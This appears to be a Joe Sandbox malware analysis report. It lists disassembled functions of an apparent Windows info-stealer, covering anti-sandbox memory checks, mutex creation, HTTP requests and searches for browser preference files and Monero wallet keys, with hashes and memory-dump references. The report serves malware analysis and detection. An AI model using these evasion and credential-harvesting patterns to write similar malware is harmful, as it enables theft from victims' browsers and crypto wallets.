                        • Instruction Fuzzy Hash: 1A314178900108ABDB04F7F2DC56BEE7778BF04342F444629F902A21C1EF705589E7AA
                        Function 00C41220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1436 c41220-c41247 call c589b0 GlobalMemoryStatusEx 1439 c41273-c4127a 1436->1439 1440 c41249-c41271 call c5da00 * 2 1436->1440 1442 c41281-c41285 1439->1442 1440->1442 1444 c41287 1442->1444 1445 c4129a-c4129d 1442->1445 1447 c41292-c41294 ExitProcess 1444->1447 1448 c41289-c41290 1444->1448 1448->1445 1448->1447
                        APIs
                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00C4123E
                        • __aulldiv.LIBCMT ref: 00C41258
                        • __aulldiv.LIBCMT ref: 00C41266
                        • ExitProcess.KERNEL32 ref: 00C41294
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 3404098578-2766056989
                        • Opcode ID: 7ea03a3726c173a4dc407aa9702d0fe952b54efb9cb1c22f6aa0c7e3df80d758
                        • Instruction ID: 296fecb2b29c3a9ef121fe8413ec7c1b57bd44f2bcb8d73ce77c1a2ce9071f8b
                        • Opcode Fuzzy Hash: 7ea03a3726c173a4dc407aa9702d0fe952b54efb9cb1c22f6aa0c7e3df80d758
                        • Instruction Fuzzy Hash: F20162B0D44308BAEB20DBD0CC49B9EB778BB04701F248055EB05F61C0D7B456859759
                        Function 00C56AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1450 c56af3 1451 c56b0a 1450->1451 1453 c56b0c-c56b22 call c56920 call c55b10 CloseHandle ExitProcess 1451->1453 1454 c56aba-c56ad7 call c5aad0 OpenEventA 1451->1454 1459 c56af5-c56b04 CloseHandle Sleep 1454->1459 1460 c56ad9-c56af1 call c5aad0 CreateEventA 1454->1460 1459->1451 1460->1453
                        APIs
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0089ADD8,?,00C6110C,?,00000000,?,00C61110,?,00000000,00C60AEF), ref: 00C56ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C56AE8
                        • CloseHandle.KERNEL32(00000000), ref: 00C56AF9
                        • Sleep.KERNEL32(00001770), ref: 00C56B04
                        • CloseHandle.KERNEL32(?,00000000,?,0089ADD8,?,00C6110C,?,00000000,?,00C61110,?,00000000,00C60AEF), ref: 00C56B1A
                        • ExitProcess.KERNEL32 ref: 00C56B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                        • String ID:
                        • API String ID: 941982115-0
                        • Opcode ID: 5314d6ff2c53516981a26510052eccd5fdcdb95a04286dbd51443b0f80e971ba
                        • Instruction ID: b579e1ca06b063cabb82cadd757059263e7ac4b3651b0b576100998a1fc0dc58
                        • Opcode Fuzzy Hash: 5314d6ff2c53516981a26510052eccd5fdcdb95a04286dbd51443b0f80e971ba
                        • Instruction Fuzzy Hash: 3CF03078940209AFF700ABA1DC0AB7D7674EB04702F544525FD17A2191DBB05588FA6E
                        Function 00C447B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C44839
                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00C44849
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1274457161-4251816714
                        • Opcode ID: 97aa0f1818150a0ed6161408cfd828c22b38eccf9f2186646d63aa86a6400049
                        • Instruction ID: ae3aa231373a6278180ce66502f990bf22cae901cdedbad40b6a8121e727a92d
                        • Opcode Fuzzy Hash: 97aa0f1818150a0ed6161408cfd828c22b38eccf9f2186646d63aa86a6400049
                        • Instruction Fuzzy Hash: 6C216FB1D00208ABDF10DFA5E845ADE7B74FB04320F108626F919B72C0EB706A09DF81
                        Function 00C551F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                          • Part of subcall function 00C46280: InternetOpenA.WININET(00C60DFE,00000001,00000000,00000000,00000000), ref: 00C462E1
                          • Part of subcall function 00C46280: StrCmpCA.SHLWAPI(?,008A0610), ref: 00C46303
                          • Part of subcall function 00C46280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C46335
                          • Part of subcall function 00C46280: HttpOpenRequestA.WININET(00000000,GET,?,0089FCA0,00000000,00000000,00400100,00000000), ref: 00C46385
                          • Part of subcall function 00C46280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C463BF
                          • Part of subcall function 00C46280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C463D1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C55228
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                        • String ID: ERROR$ERROR
                        • API String ID: 3287882509-2579291623
                        • Opcode ID: 9270f8f20c372ad04521bfd356df4e23e2ac72a66aa8e20ea12a93de67dfdf34
                        • Instruction ID: e596a07a20c4cd3729ef4514ce99053ccfadf845086e19ab8bd8f3d1932d3bdf
                        • Opcode Fuzzy Hash: 9270f8f20c372ad04521bfd356df4e23e2ac72a66aa8e20ea12a93de67dfdf34
                        • Instruction Fuzzy Hash: 8B113334900008ABCB14FF62DD52AED7738BF50341F444264FC1A56192EF306B8DEB95
                        Function 00C41110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C4112B
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00C41132
                        • ExitProcess.KERNEL32 ref: 00C41143
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AllocCurrentExitNumaVirtual
                        • String ID:
                        • API String ID: 1103761159-0
                        • Opcode ID: ac56f1841f9e525ed6e708c2f09461959a7a1f723b82e66cd82ae67ba30bb342
                        • Instruction ID: 9e2b75cd9e5fd43ec0dc1c00be87748fed2fc9ddc3f0a961559cfcd924b9e213
                        • Opcode Fuzzy Hash: ac56f1841f9e525ed6e708c2f09461959a7a1f723b82e66cd82ae67ba30bb342
                        • Instruction Fuzzy Hash: 38E0E670985308FFF714ABA19C0EB0D76B8AB04B41F144056FB0D761D0D6B52644979A
                        Function 00C410A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00C410B3
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00C410F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: c8bfc6c30166460fa2881cb69fea99287c3d6189f7232bd6931a507546842ad5
                        • Instruction ID: 61a0d72c584ef74b2274edae986f4c8fd7fab98e5e9992bf1e5c2833a577000d
                        • Opcode Fuzzy Hash: c8bfc6c30166460fa2881cb69fea99287c3d6189f7232bd6931a507546842ad5
                        • Instruction Fuzzy Hash: 89F0E271641208BBE7149AA4AC49FAAB7E8E705B15F300459F944E3280D5729F44DBA4
                        Function 00C41190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C57910
                          • Part of subcall function 00C578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C57917
                          • Part of subcall function 00C578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00C5792F
                          • Part of subcall function 00C57850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C411B7), ref: 00C57880
                          • Part of subcall function 00C57850: RtlAllocateHeap.NTDLL(00000000), ref: 00C57887
                          • Part of subcall function 00C57850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C5789F
                        • ExitProcess.KERNEL32 ref: 00C411C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                        • String ID:
                        • API String ID: 3550813701-0
                        • Opcode ID: 4b880e47d243f69f8722f295ad0f5e3a051ddefa4482f382514ac5635f0b0498
                        • Instruction ID: 79359c8a7aa613dc2d0c4eb729363e43854402d7c6746f318cb321f706e03c3e
                        • Opcode Fuzzy Hash: 4b880e47d243f69f8722f295ad0f5e3a051ddefa4482f382514ac5635f0b0498
                        • Instruction Fuzzy Hash: 3EE0E6B991420157DA0073B17C06B1A325C5714346F080525BE09B2142FD15E58CA66D

                        Non-executed Functions

                        Function 00C538B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 00C538CC
                        • FindFirstFileA.KERNEL32(?,?), ref: 00C538E3
                        • lstrcat.KERNEL32(?,?), ref: 00C53935
                        • StrCmpCA.SHLWAPI(?,00C60F70), ref: 00C53947
                        • StrCmpCA.SHLWAPI(?,00C60F74), ref: 00C5395D
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00C53C67
                        • FindClose.KERNEL32(000000FF), ref: 00C53C7C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 1125553467-2524465048
                        • Opcode ID: 9085603c69b99c42a8ed88b90576e4a4e272ca06336a7b50248e0d445740ac9e
                        • Instruction ID: f07b6b4bab620d3e8a16db4ca75c4cfdb080d21508b9ed0662fb82a9b31e8851
                        • Opcode Fuzzy Hash: 9085603c69b99c42a8ed88b90576e4a4e272ca06336a7b50248e0d445740ac9e
                        • Instruction Fuzzy Hash: 4DA171B5A002089FDB34DFA5DC85FEA7378BB48301F084599B91DA6141EB759BC8CF62
                        Function 00C4BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                        • FindFirstFileA.KERNEL32(00000000,?,00C60B32,00C60B2B,00000000,?,?,?,00C613F4,00C60B2A), ref: 00C4BEF5
                        • StrCmpCA.SHLWAPI(?,00C613F8), ref: 00C4BF4D
                        • StrCmpCA.SHLWAPI(?,00C613FC), ref: 00C4BF63
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00C4C7BF
                        • FindClose.KERNEL32(000000FF), ref: 00C4C7D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 3334442632-726946144
                        • Opcode ID: 088cb3030dd25adfa84a32ccbfd30b2b173b1ac8547e5a5b5c467859b20de548
                        • Instruction ID: 973c86819cef344d90b5dbc4b533802e8af60a047b3f9e122b4163cbc3e8c0fb
                        • Opcode Fuzzy Hash: 088cb3030dd25adfa84a32ccbfd30b2b173b1ac8547e5a5b5c467859b20de548
                        • Instruction Fuzzy Hash: EB4252769101089BDB14FB71DD96EED733CAF84301F404668FD0AA6091EE349B8DDBA6
                        Function 00C54910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 00C5492C
                        • FindFirstFileA.KERNEL32(?,?), ref: 00C54943
                        • StrCmpCA.SHLWAPI(?,00C60FDC), ref: 00C54971
                        • StrCmpCA.SHLWAPI(?,00C60FE0), ref: 00C54987
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00C54B7D
                        • FindClose.KERNEL32(000000FF), ref: 00C54B92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
